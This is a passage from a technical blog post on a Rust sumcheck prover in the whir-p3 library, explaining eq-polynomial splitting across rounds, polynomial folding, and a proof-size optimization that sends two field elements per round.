&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges: &amp;amp;mut Vec&amp;lt;EF&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sum: &amp;amp;mut EF,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pow_bits: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Challenger: FieldChallenger&amp;lt;F&amp;gt; + GrindingChallenger&amp;lt;Witness = F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In each round $j$, the prover’s goal is the same as in the first three rounds. We need to:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Compute and send the univariate polynomial evaluations $S_j(u)$ for $u \in \{0, \infty \}$.&lt;&#x2F;li&gt;
&lt;li&gt;Update the variables for the next round.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;To do so, we’ll continue using the factorization of $S_j$ in:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
S_j(u) = \ell_j(u) \cdot t_j(u)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where, recall,&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{align}&lt;br &#x2F;&gt;
\ell_j (u) &amp;amp;= \mathrm{eq}(w_{[1, j - 1]} ; r_{[1, j - 1]}) \cdot \mathrm{eq}(w_j; u) \newline&lt;br &#x2F;&gt;
t_j (u) &amp;amp;= \sum_{x \in \{0, 1\}^{\ell - j}} \mathrm{eq}(w_{[j + 1, \ell]}; x)\cdot p(r_{[1, j - 1]}, u, x)&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;However, to compute $t_j$ we won’t use SVO and accumulators, as we did before. Instead, we’ll simply split its eq-poly into two halves, taking advantage of the fact that one part can be precomputed, thus avoiding recomputation in each round.&lt;&#x2F;p&gt;
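&lt;p&gt;Before looking at that split, it helps to see the naive computation it optimizes. The sketch below is our own toy version over &lt;code&gt;u64&lt;&#x2F;code&gt; arithmetic modulo a small prime (the modulus and the function name &lt;code&gt;t_evals&lt;&#x2F;code&gt; are assumptions): it computes $t_j(0)$ and $t_j(1)$ as direct weighted sums, taking the eq evaluations as one precomputed table rather than the two halves the real code uses:&lt;&#x2F;p&gt;

```rust
// Toy prime modulus (assumption: stands in for the real extension field).
const P: u64 = 101;

fn mul(a: u64, b: u64) -> u64 {
    a * b % P
}

/// Naive t_j(0) and t_j(1): `poly` holds the evaluations of the current folded
/// polynomial p(r_1, ..., r_{j-1}, X_j, x) in lexicographic order, so the
/// first half of the table is X_j = 0 and the second half is X_j = 1.
/// `eq_w` holds the evaluations eq(w_{[j+1, l]}; x) over the hypercube.
fn t_evals(poly: &[u64], eq_w: &[u64]) -> (u64, u64) {
    let half = poly.len() / 2;
    let t0 = (0..half).fold(0u64, |acc, x| (acc + mul(eq_w[x], poly[x])) % P);
    let t1 = (0..half).fold(0u64, |acc, x| (acc + mul(eq_w[x], poly[half + x])) % P);
    (t0, t1)
}
```

&lt;p&gt;The point of splitting the eq-poly is that its right half does not change from round to round, so it can be computed once before the loop instead of being rebuilt at every round.&lt;&#x2F;p&gt;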
&lt;p&gt;Let’s break down the function &lt;code&gt;algorithm_5&lt;&#x2F;code&gt; step by step. Before the round loop you’ll see this code snippet:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let num_vars = w.num_variables();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let half_l = num_vars &#x2F; 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Precompute eq_R = eq(w_{l&#x2F;2+1..l}, x_R)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let eq_r = eval_eq_in_hypercube(&amp;amp;w.0[half_l..]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let num_vars_x_r = eq_r.len().ilog2() as usize;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; The number of variables of x_R is: l&#x2F;2 if l is even and l&#x2F;2 + 1 if l is odd.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;debug_assert_eq!(num_vars_x_r, num_vars - half_l);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; start_round should be NUM_SVO_ROUNDS.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let start_round = challenges.len();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;challenges.reserve(num_vars - start_round);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here we define several parameters, such as the total number of variables $(\ell)$ and the current round $(\ell_0)$. But, most importantly, we precompute the right (or final) half of the eq-poly:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\mathrm{eq_R} = \mathrm{eq} (w_{\ell&#x2F;2 + 1}, \ldots, w_\ell; x_{ \ell&#x2F;2 + 1}, \ldots, x_\ell).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;After that, we start the loop. In each round $j$ we need to compute $t_j(0)$ and $t_j(1)$. To do so, we consider two cases: on one hand, the first rounds up to and including round $\ell&#x2F;2$, and on the other hand, the remaining rounds starting at round $\ell&#x2F;2 + 1$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Disclaimer:&lt;&#x2F;em&gt; You’ll see that in the code the loop starts at $i = \ell_0$, but the first round that should be computed is $\ell_0 + 1$. That’s why we have the variable &lt;code&gt;round = i + 1&lt;&#x2F;code&gt; in the code. Here in the post, to simplify the notation we call $j =$ &lt;code&gt;round&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Compute the remaining rounds, from l_0 + 1 to the end.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for i in start_round..num_vars {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; `i` is the 0-indexed variable number, so `round = i + 1`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let round = i + 1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let num_vars_poly_current = poly.num_variables();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let poly_slice = poly.as_slice();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;first-half-rounds&quot;&gt;First Half Rounds&lt;&#x2F;h4&gt;
&lt;p&gt;For the cases where $j \leq \frac{\ell}{2}$, we use the function &lt;code&gt;compute_t_evals_first_half&lt;&#x2F;code&gt; to obtain $t_j(0)$ and $t_j(1)$ in parallel. These values are computed using the following sum-splitting:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{align}&lt;br &#x2F;&gt;
t(0) &amp;amp;=&lt;br &#x2F;&gt;
\sum_{x_R} \mathrm{eq}(w_{[\ell&#x2F;2 + 1, \ell]}, x_R)&lt;br &#x2F;&gt;
\sum_{x_L} \mathrm{eq}(w_{[j + 1, \ell&#x2F;2]}, x_L) \cdot&lt;br &#x2F;&gt;
p(r_{[1,j - 1]}, 0, x_L, x_R) \newline&lt;br &#x2F;&gt;
t(1) &amp;amp;=&lt;br &#x2F;&gt;
\sum_{x_R} \mathrm{eq}(w_{[\ell&#x2F;2 + 1, \ell]}, x_R)&lt;br &#x2F;&gt;
\sum_{x_L} \mathrm{eq}(w_{[j+1, \ell&#x2F;2]}, x_L) \cdot&lt;br &#x2F;&gt;
p(r_{[1,j - 1]}, 1, x_L, x_R)&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
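&lt;p&gt;To make the sum-splitting concrete, here is a minimal Python sketch (an illustration under our own conventions, not the Rust implementation; the function names are ours). It evaluates the eq polynomial over the hypercube and computes $t(0)$ and $t(1)$ via the nested sums above:&lt;&#x2F;p&gt;

```python
def eval_eq_in_hypercube(w):
    """Evaluations of eq(w, x) for all x in {0,1}^len(w).

    The index of x is read in binary with the first variable as the
    most significant bit."""
    evals = [1.0]
    for wi in w:
        evals = [e * f for e in evals for f in (1.0 - wi, wi)]
    return evals


def t_evals_first_half(p, eq_l, eq_r):
    """t(u) = sum_{x_R} eq_R(x_R) * sum_{x_L} eq_L(x_L) * p(u, x_L, x_R).

    p holds the evaluations of the partially folded polynomial over the
    hypercube, with the current variable u as the most significant bit."""
    half = len(p) // 2
    n_r = len(eq_r)
    t = []
    for offset in (0, half):  # u = 0, then u = 1
        acc = 0.0
        for i_l, e_l in enumerate(eq_l):
            base = offset + i_l * n_r
            # Inner sum over x_R, weighted by the precomputed eq_R table.
            acc += e_l * sum(e_r * p[base + i_r] for i_r, e_r in enumerate(eq_r))
        t.append(acc)
    return t  # [t(0), t(1)]
```

Because eq is the multilinear interpolation kernel, for a multilinear $p$ these two values equal $p(0, w_L, w_R)$ and $p(1, w_L, w_R)$, which gives a quick sanity check.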
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Compute t(u) for u in {0, 1}.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let t_evals: [EF; 2] = if round &amp;lt;= half_l {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Case i+1 &amp;lt;= l&#x2F;2: Compute eq_L = eq(w_{i+2..l&#x2F;2}, x_L)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let eq_l = eval_eq_in_hypercube(&amp;amp;w.0[round..half_l]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (t_0, t_1) = join(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        || compute_t_evals_first_half(&amp;amp;eq_l, &amp;amp;eq_r, poly_slice, num_vars_x_r, 0),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            compute_t_evals_first_half(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &amp;amp;eq_l,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &amp;amp;eq_r,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                poly_slice,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                num_vars_x_r,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                1 &amp;lt;&amp;lt; (num_vars_poly_current - 1), &#x2F;&#x2F; offset for u=1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (t_0, t_1).into()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;second-half-rounds&quot;&gt;Second Half Rounds&lt;&#x2F;h4&gt;
&lt;p&gt;Similarly, in the case $j &amp;gt; \frac{\ell}{2}$, we compute $t_j(0)$ and $t_j(1)$ using &lt;code&gt;compute_t_evals_second_half&lt;&#x2F;code&gt;. Note that since $j &amp;gt; \frac{\ell}{2}$, we no longer have the inner sum involving the $\mathrm{eq_L}$ polynomial. So:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{align}&lt;br &#x2F;&gt;
t(0) &amp;amp;= \sum_x \mathrm{eq}(w_{[j + 1, \ell]}, x) \cdot p(r_{[1,j - 1]}, 0, x) \newline&lt;br &#x2F;&gt;
t(1) &amp;amp;= \sum_x \mathrm{eq}(w_{[j + 1, \ell]}, x) \cdot p(r_{[1,j - 1]}, 1, x)&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
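&lt;p&gt;In this case the computation collapses to a single weighted sum per value of $u$. As an illustrative Python sketch (again ours, not the Rust code):&lt;&#x2F;p&gt;

```python
def eval_eq_in_hypercube(w):
    # Evaluations of eq(w, x) over {0,1}^len(w); first variable is the
    # most significant bit of the index.
    evals = [1.0]
    for wi in w:
        evals = [e * f for e in evals for f in (1.0 - wi, wi)]
    return evals


def t_evals_second_half(p, eq_tail):
    """t(u) = sum_x eq(w_tail, x) * p(u, x), with u the most significant bit."""
    half = len(p) // 2
    t0 = sum(e * v for e, v in zip(eq_tail, p[:half]))
    t1 = sum(e * v for e, v in zip(eq_tail, p[half:]))
    return t0, t1
```

The two halves of the evaluation table correspond to $u = 0$ and $u = 1$, mirroring the `poly_slice[..half_size]` and `poly_slice[half_size..]` split in the code below.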
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;} else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Case i+1 &amp;gt; l&#x2F;2: Compute eq_tail = eq(w_{i+2..l}, x_tail)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let eq_tail = eval_eq_in_hypercube(&amp;amp;w.0[round..]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let half_size = 1 &amp;lt;&amp;lt; (num_vars_poly_current - 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (t_0, t_1) = join(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        || compute_t_evals_second_half(&amp;amp;eq_tail, &amp;amp;poly_slice[..half_size]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        || compute_t_evals_second_half(&amp;amp;eq_tail, &amp;amp;poly_slice[half_size..]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    (t_0, t_1).into()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;send-sample-and-update&quot;&gt;Send, Sample and Update&lt;&#x2F;h4&gt;
&lt;p&gt;Once we have $t_j(0)$ and $t_j(1)$, we compute $\ell_j(0)$ and $\ell_j(1)$ and get:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
S_j(0) &amp;amp;= \ell_j(0) \cdot t_j(0) \newline&lt;br &#x2F;&gt;
S_j(\infty) &amp;amp;= \bigl(\ell_j(1) - \ell_j(0)\bigr) \cdot \left(t_j (1) - t_j(0)\right)&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Then we add these evaluations to the prover state and sample an extension field element $r_j$. After that, we fold the polynomial and obtain:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
p(r_1, \ldots, r_j, x_{j+1}, \ldots, x_\ell).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Finally, we update the claimed sum:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\sigma_{j+1} = S_j (r_j).&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
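&lt;p&gt;Since $S_j$ has degree 2, knowing $S_j(0)$, the leading coefficient $S_j(\infty)$, and the derived value $S_j(1) = \sigma_j - S_j(0)$ determines it completely. A minimal Python sketch of the update, over a toy prime field standing in for the extension field used in the code:&lt;&#x2F;p&gt;

```python
P = 2**31 - 1  # toy prime modulus, standing in for the extension field


def update_claimed_sum(sigma, s0, s_inf, r):
    """Evaluate S(r) from S(0), S(inf) and the previous claimed sum sigma.

    S(X) = s_inf * X^2 + (S(1) - S(0) - S(inf)) * X + S(0),
    where S(1) = sigma - S(0) by the sum constraint."""
    s1 = (sigma - s0) % P  # derived, never sent
    return (s_inf * r * r + (s1 - s0 - s_inf) * r + s0) % P
```

For example, for $S(X) = 3X^2 + 5X + 7$ we have $S(0) = 7$, $S(\infty) = 3$ and $\sigma = S(0) + S(1) = 22$, and the function recovers $S(11) = 425$.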
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Compute S_i(u) = t_i(u) * l_i(u) for u in {0, inf}:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let linear_evals = compute_linear_function(&amp;amp;w.0[..round], challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let [s_0, s_inf] = get_evals_from_l_and_t(&amp;amp;linear_evals, &amp;amp;t_evals);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Send S_i(u) to the verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;prover_state.add_extension_scalars(&amp;amp;[s_0, s_inf]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;prover_state.pow_grinding(pow_bits);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Receive the challenge r_i from the verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let r_i: EF = prover_state.sample();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;challenges.push(r_i);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Fold and update the poly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;poly.compress_svo(r_i);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Update claimed sum&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let eval_1 = *sum - s_0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;*sum = s_inf * r_i.square() + (eval_1 - s_0 - s_inf) * r_i + s_0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;vi-communication-optimization&quot;&gt;VI. Communication Optimization&lt;&#x2F;h2&gt;
&lt;p&gt;Independent of the prover computation (SVO), we also optimize the communication. In a standard sumcheck, the prover sends three field elements per round (since the polynomial that needs to be sent has degree 2). However, we only send two, reducing the proof size.&lt;&#x2F;p&gt;
&lt;p&gt;The trick is that the verifier can derive the third value. For any round $i$, the prover sends:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$S_i (0)$ — the evaluation at zero.&lt;&#x2F;li&gt;
&lt;li&gt;$S_i (\infty)$ — the leading coefficient.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier, who knows the claimed sum $\sigma_i = S_{i - 1} (r_{i - 1})$ from the previous round, derives the third evaluation:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
S_i(1) = \sigma_i - S_i(0)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;This holds due to the sum constraint $S_i (0) + S_i (1) = \sigma_i$.&lt;&#x2F;p&gt;
&lt;p&gt;You can find this implemented for the prover in both the &lt;code&gt;svo_three_rounds&lt;&#x2F;code&gt; and &lt;code&gt;algorithm_5&lt;&#x2F;code&gt; functions. For example, for the first round you’ll see:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Prover side&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Round 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;prover_state.add_extension_scalars(&amp;amp;[s_0, s_inf]); &#x2F;&#x2F; Send 2 values.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let r_1: EF = prover_state.sample(); &#x2F;&#x2F; Sample a random challenge.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let s_1 = *sum - s_0; &#x2F;&#x2F; Derive 3rd value. &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;*sum = s_inf * r_1.square() + (s_1 - s_0 - s_inf) * r_1 + s_0; &#x2F;&#x2F; Update sum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifier’s job is simpler: it reads the proof, derives missing values, and verifies consistency. You can find the implementation in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&#x2F;blob&#x2F;eec71d03a5ec81f30acc6d591f42f318941c6df5&#x2F;src&#x2F;whir&#x2F;verifier&#x2F;sumcheck.rs#L144&quot;&gt;&lt;code&gt;verify_sumcheck_round_svo&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Verifier Side&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for _ in 0..rounds {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Extract the first and third evaluations of the sumcheck polynomial&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; and derive the second evaluation from the latest sum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c0 = verifier_state.next_extension_scalar()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c1 = *claimed_sum - c0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c2 = verifier_state.next_extension_scalar()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
